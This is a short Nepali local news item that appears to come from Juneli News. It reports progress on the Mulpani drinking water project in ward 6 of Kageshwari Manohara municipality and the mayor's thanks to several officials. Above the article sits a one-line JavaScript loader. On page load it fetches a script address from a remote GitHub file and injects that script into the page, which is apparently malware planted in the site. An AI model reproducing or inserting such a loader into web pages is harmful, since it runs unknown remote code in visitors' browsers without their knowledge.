;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});
जुनेली न्युज, काठमाडौँ |
कागेश्वरी मनोहरा नगरपालिका वडा न ६ अन्तरगतको मुलपानी खानेपानी आयोजना पुरा हुने भएको छ | सो वडा न ६ को छुटेको सबै भागलाई समेट्ने गरि चाडै नै ठेक्का लाग्ने गरि मेयर उपेन्द्र कार्कीले कार्य अगाडी बढाएका छन् |
खानेपानीको समस्या समाधान गर्न सहयोग गर्ने मुख्य मन्त्री बहादुर सिंह लामा ज्यु, खानेपानी मन्त्री श्याम खड्का ज्यु र वडा न ६ को खानेपानीको बिषयमा चासो लिनु हुने नेपाली काँग्रेसका सभापति कबिर शर्मा, वडा अध्यक्ष प्रकाश फुयाल, समितिका अध्यक्ष दिनेश फुयाल लगायत वडाका सम्पुर्ण टिमलाई मेयर कार्कीले धन्यवाद समेत दिएका छन्|
फेसबुक प्रतिक्रियाहरु